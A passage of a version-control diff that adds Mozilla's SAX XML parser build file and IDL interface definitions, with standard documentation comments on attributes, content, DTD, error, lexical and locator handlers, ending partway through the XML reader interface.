diff options
Diffstat (limited to 'parser/xml')
25 files changed, 3695 insertions, 0 deletions
diff --git a/parser/xml/moz.build b/parser/xml/moz.build new file mode 100644 index 000000000..fbce634c1 --- /dev/null +++ b/parser/xml/moz.build @@ -0,0 +1,36 @@ +# -*- Mode: python; indent-tabs-mode: nil; tab-width: 40 -*- +# vim: set filetype=python: +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, You can obtain one at http://mozilla.org/MPL/2.0/. + +TEST_DIRS += ['test'] + +XPIDL_SOURCES += [ + 'nsIMozSAXXMLDeclarationHandler.idl', + 'nsISAXAttributes.idl', + 'nsISAXContentHandler.idl', + 'nsISAXDTDHandler.idl', + 'nsISAXErrorHandler.idl', + 'nsISAXLexicalHandler.idl', + 'nsISAXLocator.idl', + 'nsISAXMutableAttributes.idl', + 'nsISAXXMLFilter.idl', + 'nsISAXXMLReader.idl', +] + +XPIDL_MODULE = 'saxparser' + +EXPORTS += [ + 'nsSAXAttributes.h', + 'nsSAXLocator.h', + 'nsSAXXMLReader.h', +] + +SOURCES += [ + 'nsSAXAttributes.cpp', + 'nsSAXLocator.cpp', + 'nsSAXXMLReader.cpp', +] + +FINAL_LIBRARY = 'xul' diff --git a/parser/xml/nsIMozSAXXMLDeclarationHandler.idl b/parser/xml/nsIMozSAXXMLDeclarationHandler.idl new file mode 100644 index 000000000..2e9c0d6d6 --- /dev/null +++ b/parser/xml/nsIMozSAXXMLDeclarationHandler.idl @@ -0,0 +1,15 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/* This is a helper for the XML declaration in a document: + * <?xml version='1.0' encoding='UTF-8' standalone='yes'?> + */ + +[scriptable, function, uuid(c0e461cb-0e5e-284c-b97d-cffeec467eba)] +interface nsIMozSAXXMLDeclarationHandler: nsISupports { + void handleXMLDeclaration(in AString version, in AString encoding, in boolean standalone); +}; diff --git a/parser/xml/nsISAXAttributes.idl b/parser/xml/nsISAXAttributes.idl new file mode 100644 index 000000000..c9b0a8a7e --- /dev/null +++ b/parser/xml/nsISAXAttributes.idl @@ -0,0 +1,150 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * Interface for a list of XML attributes. + * + * This interface allows access to a list of attributes in + * three different ways: + * + * 1.) by attribute index; + * 2.) by Namespace-qualified name; or + * 3.) by XML qualified name. + * + * The list will not contain attributes that were declared #IMPLIED + * but not specified in the start tag. It will also not contain + * attributes used as Namespace declarations (xmlns*) unless the + * http://xml.org/sax/features/namespace-prefixes feature + * is set to true (it is false by default). + * + * The order of attributes in the list is unspecified. + */ +[scriptable, uuid(e347005e-6cd0-11da-be43-001422106990)] +interface nsISAXAttributes : nsISupports +{ + /** + * Look up the index of an attribute by Namespace name. + * @param uri The Namespace URI, or the empty string + * if the name has no Namespace URI. + * @param localName The attribute's local name. + * @return The index of the attribute, or -1 + * if it does not appear in the list. + */ + long getIndexFromName(in AString uri, in AString localName); + + /** + * Look up the index of an attribute by XML qualified name. + * @param qName The qualified name. + * @return The index of the attribute, or -1 + * if it does not appear in the list. + */ + long getIndexFromQName(in AString qName); + + /** + * Return the number of attributes in the list. Once you know the + * number of attributes, you can iterate through the list. + * + * @return The number of attributes in the list. + */ + readonly attribute long length; + + /** + * Look up an attribute's local name by index. + * @param index The attribute index (zero-based). + * @return The local name, or null if the index is out of range. + */ + AString getLocalName(in unsigned long index); + + /** + * Look up an attribute's XML qualified name by index. + * @param index The attribute index (zero-based). + * @return The XML qualified name, or the empty string if none is + * available, or null if the index is out of range. + */ + AString getQName(in unsigned long index); + + /** + * Look up an attribute's type by index. The attribute type is one + * of the strings "CDATA", "ID", "IDREF", "IDREFS", "NMTOKEN", + * "NMTOKENS", "ENTITY", "ENTITIES", or "NOTATION" (always in upper + * case). If the parser has not read a declaration for the + * attribute, or if the parser does not report attribute types, then + * it must return the value "CDATA" as stated in the XML 1.0 + * Recommendation (clause 3.3.3, "Attribute-Value + * Normalization"). For an enumerated attribute that is not a + * notation, the parser will report the type as "NMTOKEN". + * + * @param index The attribute index (zero-based). + * @return The attribute's type as a string, or null if the index is + * out of range. + */ + AString getType(in unsigned long index); + + /** + * Look up an attribute's type by Namespace name. + * @param uri The Namespace URI, or the empty string + * if the name has no Namespace URI. + * @param localName The attribute's local name. + * @return The attribute type as a string, or null if the attribute + * is not in the list. + */ + AString getTypeFromName(in AString uri, in AString localName); + + /** + * Look up an attribute's type by XML qualified name. + * @param qName The qualified name. + * @return The attribute type as a string, or null if the attribute + * is not in the list. + */ + AString getTypeFromQName(in AString qName); + + /** + * Look up an attribute's Namespace URI by index. + * @param index The attribute index (zero-based). + * @return The Namespace URI, or the empty string if none is available, + * or null if the index is out of range. + */ + AString getURI(in unsigned long index); + + /** + * Look up an attribute's value by index. If the attribute value is + * a list of tokens (IDREFS, ENTITIES, or NMTOKENS), the tokens will + * be concatenated into a single string with each token separated by + * a single space. + * + * @param index The attribute index (zero-based). + * @return The attribute's value as a string, or null if the index is + * out of range. + */ + AString getValue(in unsigned long index); + + /** + * Look up an attribute's value by Namespace name. If the attribute + * value is a list of tokens (IDREFS, ENTITIES, or NMTOKENS), the + * tokens will be concatenated into a single string with each token + * separated by a single space. + * + * @param uri The Namespace URI, or the empty string + * if the name has no Namespace URI. + * @param localName The attribute's local name. + * @return The attribute's value as a string, or null if the attribute is + * not in the list. + */ + AString getValueFromName(in AString uri, in AString localName); + + /** + * Look up an attribute's value by XML qualified (prefixed) name. + * If the attribute value is a list of tokens (IDREFS, ENTITIES, or + * NMTOKENS), the tokens will be concatenated into a single string + * with each token separated by a single space. + * + * @param qName The qualified (prefixed) name. + * @return The attribute's value as a string, or null if the attribute is + * not in the list. + */ + AString getValueFromQName(in AString qName); +}; diff --git a/parser/xml/nsISAXContentHandler.idl b/parser/xml/nsISAXContentHandler.idl new file mode 100644 index 000000000..43b7e48c5 --- /dev/null +++ b/parser/xml/nsISAXContentHandler.idl @@ -0,0 +1,225 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +interface nsISAXAttributes; + +/** + * Receive notification of the logical content of a document. + * + * This is the main interface that most SAX applications implement: if + * the application needs to be informed of basic parsing events, it + * implements this interface and registers an instance with the SAX + * parser. The parser uses the instance to report basic + * document-related events like the start and end of elements and + * character data. + * + * The order of events in this interface is very important, and + * mirrors the order of information in the document itself. For + * example, all of an element's content (character data, processing + * instructions, and/or subelements) will appear, in order, between + * the startElement event and the corresponding endElement event. + */ +[scriptable, uuid(2a99c757-dfee-4806-bff3-f721440412e0)] +interface nsISAXContentHandler : nsISupports +{ + /** + * Receive notification of the beginning of a document. + * + * The SAX parser will invoke this method only once, before any + * other event callbacks. + */ + void startDocument(); + + /** + * Receive notification of the end of a document. + * + * There is an apparent contradiction between the documentation for + * this method and the documentation for ErrorHandler.fatalError(). + * Until this ambiguity is resolved in a future major release, + * clients should make no assumptions about whether endDocument() + * will or will not be invoked when the parser has reported a + * fatalError() or thrown an exception. + * + * The SAX parser will invoke this method only once, and it will be + * the last method invoked during the parse. The parser shall not + * invoke this method until it has either abandoned parsing (because + * of an unrecoverable error) or reached the end of input. + */ + void endDocument(); + + /** + * Receive notification of the beginning of an element. + * + * The Parser will invoke this method at the beginning of every + * element in the XML document; there will be a corresponding + * endElement event for every startElement event (even when the + * element is empty). All of the element's content will be reported, + * in order, before the corresponding endElement event. + * + * This event allows up to three name components for each element: + * + * 1.) the Namespace URI; + * 2.) the local name; and + * 3.) the qualified (prefixed) name. + * + * Any or all of these may be provided, depending on the values of + * the http://xml.org/sax/features/namespaces and the + * http://xml.org/sax/features/namespace-prefixes properties: + * + * The Namespace URI and local name are required when the namespaces + * property is true (the default), and are optional when the + * namespaces property is false (if one is specified, both must be); + * + * The qualified name is required when the namespace-prefixes + * property is true, and is optional when the namespace-prefixes + * property is false (the default). + * + * Note that the attribute list provided will contain only + * attributes with explicit values (specified or defaulted): + * #IMPLIED attributes will be omitted. The attribute list will + * contain attributes used for Namespace declarations (xmlns* + * attributes) only if the + * http://xml.org/sax/features/namespace-prefixes property is true + * (it is false by default, and support for a true value is + * optional). + * + * @param uri the Namespace URI, or the empty string if the + * element has no Namespace URI or if Namespace + * processing is not being performed + * @param localName the local name (without prefix), or the + * empty string if Namespace processing is not being + * performed + * @param qName the qualified name (with prefix), or the + * empty string if qualified names are not available + * @param atts the attributes attached to the element. If + * there are no attributes, it shall be an empty + * SAXAttributes object. The value of this object after + * startElement returns is undefined + */ + void startElement(in AString uri, in AString localName, + in AString qName, in nsISAXAttributes attributes); + + /** + * Receive notification of the end of an element. + * + * The SAX parser will invoke this method at the end of every + * element in the XML document; there will be a corresponding + * startElement event for every endElement event (even when the + * element is empty). + * + * For information on the names, see startElement. + * + * @param uri the Namespace URI, or the empty string if the + * element has no Namespace URI or if Namespace + * processing is not being performed + * @param localName the local name (without prefix), or the + * empty string if Namespace processing is not being + * performed + * @param qName the qualified XML name (with prefix), or the + * empty string if qualified names are not available + */ + void endElement(in AString uri, in AString localName, in AString qName); + + /** + * Receive notification of character data. + * + * The Parser will call this method to report each chunk of + * character data. SAX parsers may return all contiguous character + * data in a single chunk, or they may split it into several chunks; + * however, all of the characters in any single event must come from + * the same external entity so that the Locator provides useful + * information. + * + * Note that some parsers will report whitespace in element + * content using the ignorableWhitespace method rather than this one + * (validating parsers must do so). + * + * @param value the characters from the XML document + */ + void characters(in AString value); + + /** + * Receive notification of a processing instruction. + * + * The Parser will invoke this method once for each processing + * instruction found: note that processing instructions may occur + * before or after the main document element. + * + * A SAX parser must never report an XML declaration (XML 1.0, + * section 2.8) or a text declaration (XML 1.0, section 4.3.1) using + * this method. + * + * @param target the processing instruction target + * @param data the processing instruction data, or null if + * none was supplied. The data does not include any + * whitespace separating it from the target + */ + void processingInstruction(in AString target, in AString data); + + /** + * Receive notification of ignorable whitespace in element content. + * + * Validating Parsers must use this method to report each chunk of + * whitespace in element content (see the W3C XML 1.0 + * recommendation, section 2.10): non-validating parsers may also + * use this method if they are capable of parsing and using content + * models. + * + * SAX parsers may return all contiguous whitespace in a single + * chunk, or they may split it into several chunks; however, all of + * the characters in any single event must come from the same + * external entity, so that the Locator provides useful information. + * + * @param whitespace the characters from the XML document + */ + void ignorableWhitespace(in AString whitespace); + + /** + * Begin the scope of a prefix-URI Namespace mapping. + * + * The information from this event is not necessary for normal + * Namespace processing: the SAX XML reader will automatically + * replace prefixes for element and attribute names when the + * http://xml.org/sax/features/namespaces feature is + * true (the default). + * + * There are cases, however, when applications need to use prefixes + * in character data or in attribute values, where they cannot + * safely be expanded automatically; the start/endPrefixMapping + * event supplies the information to the application to expand + * prefixes in those contexts itself, if necessary. + * + * Note that start/endPrefixMapping events are not guaranteed to be + * properly nested relative to each other: all startPrefixMapping + * events will occur immediately before the corresponding + * startElement event, and all endPrefixMapping events will occur + * immediately after the corresponding endElement event, but their + * order is not otherwise guaranteed. + * + * There should never be start/endPrefixMapping events for the + * "xml" prefix, since it is predeclared and immutable. + * + * @param prefix The Namespace prefix being declared. An empty + * string is used for the default element namespace, + * which has no prefix. + * @param uri The Namespace URI the prefix is mapped to. + */ + void startPrefixMapping(in AString prefix, in AString uri); + + /** + * End the scope of a prefix-URI mapping. + * + * See startPrefixMapping for details. These events will always + * occur immediately after the corresponding endElement event, but + * the order of endPrefixMapping events is not otherwise guaranteed. + * + * @param prefix The prefix that was being mapped. This is the empty + * string when a default mapping scope ends. + */ + void endPrefixMapping(in AString prefix); + //XXX documentLocator +}; diff --git a/parser/xml/nsISAXDTDHandler.idl b/parser/xml/nsISAXDTDHandler.idl new file mode 100644 index 000000000..b4cb51d1b --- /dev/null +++ b/parser/xml/nsISAXDTDHandler.idl @@ -0,0 +1,77 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * Receive notification of basic DTD-related events. + * + * If a SAX application needs information about notations and + * unparsed entities, then the application implements this interface + * and registers an instance with the SAX parser using the parser's + * setDTDHandler method. The parser uses the instance to report + * notation and unparsed entity declarations to the application. + * + * Note that this interface includes only those DTD events that the + * XML recommendation requires processors to report: notation and + * unparsed entity declarations. + * + * The SAX parser may report these events in any order, regardless + * of the order in which the notations and unparsed entities were + * declared; however, all DTD events must be reported after the + * document handler's startDocument event, and before the first + * startElement event. (If the LexicalHandler is used, these events + * must also be reported before the endDTD event.) + */ +[scriptable, uuid(4d01f225-6cc5-11da-be43-001422106990)] +interface nsISAXDTDHandler : nsISupports { + + /** + * Receive notification of a notation declaration event. + * + * It is up to the application to record the notation for later + * reference, if necessary; notations may appear as attribute values + * and in unparsed entity declarations, and are sometime used with + * processing instruction target names. + * + * At least one of publicId and systemId must be non-null. If a + * system identifier is present, and it is a URL, the SAX parser + * must resolve it fully before passing it to the application + * through this event. + * + * There is no guarantee that the notation declaration will be + * reported before any unparsed entities that use it. + * + * @param name The notation name. + * @param publicId The notation's public identifier, or null if none was + * given. + * @param systemId The notation's system identifier, or null if none was + * given. + */ + void notationDecl(in AString name, + in AString publicId, + in AString systemId); + + /** + * Receive notification of an unparsed entity declaration event. + * + * Note that the notation name corresponds to a notation reported + * by the notationDecl event. It is up to the application to record + * the entity for later reference, if necessary; unparsed entities + * may appear as attribute values. + * + * If the system identifier is a URL, the parser must resolve it + * fully before passing it to the application. + * + * @param name The unparsed entity's name. + * @param publicId The entity's public identifier, or null if none was + * given. + * @param systemId The entity's system identifier, or null if none was + * given. + * @param notationName The name of the associated notation. + */ + void unparsedEntityDecl(in AString name, in AString publicId, + in AString systemId, in AString notationName); +}; diff --git a/parser/xml/nsISAXErrorHandler.idl b/parser/xml/nsISAXErrorHandler.idl new file mode 100644 index 000000000..ea8af79ce --- /dev/null +++ b/parser/xml/nsISAXErrorHandler.idl @@ -0,0 +1,95 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +interface nsISAXLocator; + +/** + * Basic interface for SAX error handlers. + * + * If a SAX application needs to implement customized error + * handling, it must implement this interface and then register an + * instance with the XML reader. The parser will then report all + * errors and warnings through this interface. + * + * WARNING: If an application does not register an ErrorHandler, + * XML parsing errors will go unreported. In order to detect validity + * errors, an ErrorHandler that does something with error() calls must + * be registered. + * + */ +[scriptable, uuid(e02b6693-6cca-11da-be43-001422106990)] +interface nsISAXErrorHandler: nsISupports { + + /** + * Receive notification of a recoverable error. + * + * This corresponds to the definition of "error" in section 1.2 + * of the W3C XML 1.0 Recommendation. For example, a validating + * parser would use this callback to report the violation of a + * validity constraint. The default behaviour is to take no + * action. + * + * The SAX parser must continue to provide normal parsing events + * after invoking this method: it should still be possible for the + * application to process the document through to the end. If the + * application cannot do so, then the parser should report a fatal + * error even if the XML recommendation does not require it to do + * so. + * + * Filters may use this method to report other, non-XML errors as + * well. + * + * @param locator The locator object for the error (may be null). + * @param error The error message. + */ + void error(in nsISAXLocator locator, in AString error); + + /** + * Receive notification of a non-recoverable error. + * + * There is an apparent contradiction between the documentation + * for this method and the documentation for + * ContentHandler.endDocument(). Until this ambiguity is resolved in + * a future major release, clients should make no assumptions about + * whether endDocument() will or will not be invoked when the parser + * has reported a fatalError() or thrown an exception. + * + * This corresponds to the definition of "fatal error" in section + * 1.2 of the W3C XML 1.0 Recommendation. For example, a parser + * would use this callback to report the violation of a + * well-formedness constraint. + * + * The application must assume that the document is unusable + * after the parser has invoked this method, and should continue (if + * at all) only for the sake of collecting additional error + * messages: in fact, SAX parsers are free to stop reporting any + * other events once this method has been invoked. + * + * @param locator The locator object for the error (may be null). + * @param error The error message. + */ + void fatalError(in nsISAXLocator locator, in AString error); + + /** + * Receive notification of a warning. + * + * SAX parsers will use this method to report conditions that are + * not errors or fatal errors as defined by the XML + * recommendation. The default behaviour is to take no action. + * + * The SAX parser must continue to provide normal parsing events + * after invoking this method: it should still be possible for the + * application to process the document through to the end. + * + * Filters may use this method to report other, non-XML warnings + * as well. + * + * @param locator The locator object for the warning (may be null). + * @param error The warning message. + */ + void ignorableWarning(in nsISAXLocator locator, in AString error); +}; diff --git a/parser/xml/nsISAXLexicalHandler.idl b/parser/xml/nsISAXLexicalHandler.idl new file mode 100644 index 000000000..ed50de2b7 --- /dev/null +++ b/parser/xml/nsISAXLexicalHandler.idl @@ -0,0 +1,118 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * SAX2 extension handler for lexical events. + * + * This is an extension handler for SAX2 to provide lexical + * information about an XML document, such as comments and CDATA + * section boundaries. + * + * The events in the lexical handler apply to the entire document, + * not just to the document element, and all lexical handler events + * must appear between the content handler's startDocument and + * endDocument events. + */ +[scriptable, uuid(23c26a56-adff-440c-8caf-95c2dc2e399b)] +interface nsISAXLexicalHandler : nsISupports { + + /** + * Report an XML comment anywhere in the document. + * + * This callback will be used for comments inside or outside the + * document element, including comments in the external DTD subset + * (if read). Comments in the DTD must be properly nested inside + * start/endDTD and start/endEntity events (if used). + * + * @param chars The characters in the comment. + */ + void comment(in AString chars); + + /** + * Report the start of DTD declarations, if any. + * + * This method is intended to report the beginning of the + * DOCTYPE declaration; if the document has no DOCTYPE declaration, + * this method will not be invoked. + * + * All declarations reported through DTDHandler or DeclHandler + * events must appear between the startDTD and endDTD events. + * Declarations are assumed to belong to the internal DTD subset + * unless they appear between startEntity and endEntity events. + * Comments and processing instructions from the DTD should also be + * reported between the startDTD and endDTD events, in their + * original order of (logical) occurrence; they are not required to + * appear in their correct locations relative to DTDHandler or + * DeclHandler events, however. + * + * Note that the start/endDTD events will appear within the + * start/endDocument events from ContentHandler and before the first + * startElement event. + * + * @param name The document type name. + * @param publicId The declared public identifier for the + * external DTD subset, or null if none was declared. + * @param systemId The declared system identifier for the + * external DTD subset, or null if none was declared. + * (Note that this is not resolved against the document + * base URI.) + */ + void startDTD(in AString name, in AString publicId, in AString systemId); + + /** + * Report the end of DTD declarations. + * + * This method is intended to report the end of the + * DOCTYPE declaration; if the document has no DOCTYPE declaration, + * this method will not be invoked. + */ + void endDTD(); + + /** + * Report the start of a CDATA section. + * + * The contents of the CDATA section will be reported through the + * regular characters event; this event is intended only to report + * the boundary. + */ + void startCDATA(); + + /** + * Report the end of a CDATA section. + */ + void endCDATA(); + + /** + * Report the beginning of some internal and external XML entities. + * + * Because of the streaming event model that SAX uses, some + * entity boundaries cannot be reported under any circumstances: + * + * 1.) general entities within attribute values + * 2.) parameter entities within declarations + * + * These will be silently expanded, with no indication of where + * the original entity boundaries were. + * + * Note also that the boundaries of character references (which + * are not really entities anyway) are not reported. + * + * All start/endEntity events must be properly nested. + * + * @param name The name of the entity. If it is a parameter + * entity, the name will begin with '%', and if it is the + * external DTD subset, it will be "[dtd]". + */ + void startEntity(in AString name); + + /** + * Report the end of an entity. + * + * @param name The name of the entity that is ending. + */ + void endEntity(in AString name); +}; diff --git a/parser/xml/nsISAXLocator.idl b/parser/xml/nsISAXLocator.idl new file mode 100644 index 000000000..a5808313f --- /dev/null +++ b/parser/xml/nsISAXLocator.idl @@ -0,0 +1,89 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * Interface for associating a SAX event with a document location. + * + * Note that the results returned by the object will be valid only + * during the scope of each callback method: the application will + * receive unpredictable results if it attempts to use the locator at + * any other time, or after parsing completes. + */ +[scriptable, uuid(7a307c6c-6cc9-11da-be43-001422106990)] +interface nsISAXLocator: nsISupports { + + /** + * Return the column number where the current document event ends. + * + * Warning: The return value from the method is intended only as an + * approximation for the sake of diagnostics; it is not intended to + * provide sufficient information to edit the character content of + * the original XML document. For example, when lines contain + * combining character sequences, wide characters, surrogate pairs, + * or bi-directional text, the value may not correspond to the + * column in a text editor's display. + * + * The return value is an approximation of the column number in the + * document entity or external parsed entity where the markup + * triggering the event appears. + * + * If possible, the SAX driver should provide the line position of + * the first character after the text associated with the document + * event. The first column in each line is column 1. + * + * @return The column number, or -1 if none is available. + */ + readonly attribute long columnNumber; + + /** + * Return the line number where the current document event ends. + * Lines are delimited by line ends, which are defined in the XML + * specification. + * + * Warning: The return value from the method is intended only as an + * approximation for the sake of diagnostics; it is not intended to + * provide sufficient information to edit the character content of + * the original XML document. In some cases, these "line" numbers + * match what would be displayed as columns, and in others they may + * not match the source text due to internal entity expansion. + * + * The return value is an approximation of the line number in the + * document entity or external parsed entity where the markup + * triggering the event appears. + * + * If possible, the SAX driver should provide the line position of + * the first character after the text associated with the document + * event. The first line is line 1. + * + * @return The line number, or -1 if none is available. + */ + readonly attribute long lineNumber; + + /** + * Return the public identifier for the current document event. + * + * The return value is the public identifier of the document entity + * or of the external parsed entity in which the markup triggering + * the event appears. + * + * @return A string containing the public identifier, or + * null if none is available. + */ + readonly attribute AString publicId; + + /** + * Return the system identifier for the current document event. + * + * The return value is the system identifier of the document entity + * or of the external parsed entity in which the markup triggering + * the event appears. + * + * @return A string containing the system identifier, or null + * if none is available. + */ + readonly attribute AString systemId; +}; diff --git a/parser/xml/nsISAXMutableAttributes.idl b/parser/xml/nsISAXMutableAttributes.idl new file mode 100644 index 000000000..c3c205005 --- /dev/null +++ b/parser/xml/nsISAXMutableAttributes.idl @@ -0,0 +1,127 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" +#include "nsISAXAttributes.idl" + +/** + * This interface extends the nsISAXAttributes interface with + * manipulators so that the list can be modified or reused. + */ +[scriptable, uuid(8b1de83d-cebb-49fa-8245-c0fe319eb7b6)] +interface nsISAXMutableAttributes : nsISAXAttributes { + + /** + * Add an attribute to the end of the list. + * + * For the sake of speed, this method does no checking + * to see if the attribute is already in the list: that is + * the responsibility of the application. + * + * @param uri The Namespace URI, or the empty string if + * none is available or Namespace processing is not + * being performed. + * @param localName The local name, or the empty string if + * Namespace processing is not being performed. + * @param qName The qualified (prefixed) name, or the empty string + * if qualified names are not available. + * @param type The attribute type as a string. + * @param value The attribute value. + */ + void addAttribute(in AString uri, + in AString localName, + in AString qName, + in AString type, + in AString value); + + /** + * Clear the attribute list for reuse. + */ + void clear(); + + /** + * Remove an attribute from the list. + * + * @param index The index of the attribute (zero-based). + */ + void removeAttribute(in unsigned long index); + + /** + * Set the attributes list. This method will clear any attributes in + * the list before adding the attributes from the argument. + * + * @param attributes The attributes object to replace populate the + * list with. + */ + void setAttributes(in nsISAXAttributes attributes); + + /** + * Set an attribute in the list. + * + * For the sake of speed, this method does no checking for name + * conflicts or well-formedness: such checks are the responsibility + * of the application. + * + * @param index The index of the attribute (zero-based). + * @param uri The Namespace URI, or the empty string if + * none is available or Namespace processing is not + * being performed. + * @param localName The local name, or the empty string if + * Namespace processing is not being performed. + * @param qName The qualified name, or the empty string + * if qualified names are not available. + * @param type The attribute type as a string. + * @param value The attribute value. + */ + void setAttribute(in unsigned long index, + in AString uri, + in AString localName, + in AString qName, + in AString type, + in AString value); + + /** + * Set the local name of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param localName The attribute's local name, or the empty + * string for none. + */ + void setLocalName(in unsigned long index, in AString localName); + + /** + * Set the qualified name of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param qName The attribute's qualified name, or the empty + * string for none. + */ + void setQName(in unsigned long index, in AString qName); + + /** + * Set the type of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param type The attribute's type. + */ + void setType(in unsigned long index, in AString type); + + /** + * Set the Namespace URI of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param uri The attribute's Namespace URI, or the empty + * string for none. + */ + void setURI(in unsigned long index, in AString uri); + + /** + * Set the value of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param value The attribute's value. + */ + void setValue(in unsigned long index, in AString value); +}; diff --git a/parser/xml/nsISAXXMLFilter.idl b/parser/xml/nsISAXXMLFilter.idl new file mode 100644 index 000000000..44b637db9 --- /dev/null +++ b/parser/xml/nsISAXXMLFilter.idl @@ -0,0 +1,29 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" +#include "nsISAXXMLReader.idl" + +/** + * Interface for an XML filter. + * + * An XML filter is like an XML reader, except that it obtains its + * events from another XML reader rather than a primary source like an + * XML document or database. Filters can modify a stream of events as + * they pass on to the final application. + */ +[scriptable, uuid(77a22cf0-6cdf-11da-be43-001422106990)] +interface nsISAXXMLFilter : nsISAXXMLReader { + + /** + * The parent reader. + * + * Allows the application to query the parent reader (which may be + * another filter). It is generally a bad idea to perform any + * operations on the parent reader directly: they should all pass + * through this filter. + */ + attribute nsISAXXMLReader parent; +}; diff --git a/parser/xml/nsISAXXMLReader.idl b/parser/xml/nsISAXXMLReader.idl new file mode 100644 index 000000000..8dedcc3f6 --- /dev/null +++ b/parser/xml/nsISAXXMLReader.idl @@ -0,0 +1,207 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsIStreamListener.idl" + +interface nsIInputStream; +interface nsIRequestObserver; +interface nsIURI; + +interface nsISAXContentHandler; +interface nsISAXDTDHandler; +interface nsISAXEntityResolver; +interface nsISAXErrorHandler; +interface nsISAXLexicalHandler; +interface nsIMozSAXXMLDeclarationHandler; + +/** + * Interface for reading an XML document using callbacks. + * + * nsISAXXMLReader is the interface that an XML parser's SAX2 + * driver must implement. This interface allows an application to set + * and query features and properties in the parser, to register event + * handlers for document processing, and to initiate a document + * parse. + */ +[scriptable, uuid(5b1de802-9091-454f-9972-5753c0d0c70e)] +interface nsISAXXMLReader : nsIStreamListener { + + /** + * The base URI. + */ + attribute nsIURI baseURI; + + /** + * If the application does not register a content handler, all + * content events reported by the SAX parser will be silently + * ignored. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXContentHandler contentHandler; + + /** + * If the application does not register a DTD handler, all DTD + * events reported by the SAX parser will be silently ignored. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXDTDHandler dtdHandler; + + + /** + * If the application does not register an error handler, all + * error events reported by the SAX parser will be silently ignored; + * however, normal processing may not continue. It is highly + * recommended that all SAX applications implement an error handler + * to avoid unexpected bugs. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXErrorHandler errorHandler; + + /** + * A handler for the (optional) XML declaration of a document. + * <?xml version='1.0'?> + * + * @note This is not part of the SAX standard. + */ + attribute nsIMozSAXXMLDeclarationHandler declarationHandler; + + /** + * If the application does not register a lexical handler, all + * lexical events (e.g. startDTD) reported by the SAX parser will be + * silently ignored. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXLexicalHandler lexicalHandler; + + /** + * Set the value of a feature flag. + * + * The feature name is any fully-qualified URI. It is possible + * for an XMLReader to expose a feature value but to be unable to + * change the current value. Some feature values may be immutable + * or mutable only in specific contexts, such as before, during, or + * after a parse. + * + * All XMLReaders are required to support setting + * http://xml.org/sax/features/namespaces to true and + * http://xml.org/sax/features/namespace-prefixes to false. + * + * @param name String flag for a parser feature. + * @param value Turn the feature on/off. + * + * @note This is currently supported only for + * http://xml.org/sax/features/namespace-prefixes . All other + * features will result in a NOT_IMPLEMENTED exception. + */ + void setFeature(in AString name, in boolean value); + + /** + * Look up the value of a feature flag. + * + * The feature name is any fully-qualified URI. It is + * possible for an XMLReader to recognize a feature name but + * temporarily be unable to return its value. + * Some feature values may be available only in specific + * contexts, such as before, during, or after a parse. + * + * All XMLReaders are required to recognize the + * http://xml.org/sax/features/namespaces and the + * 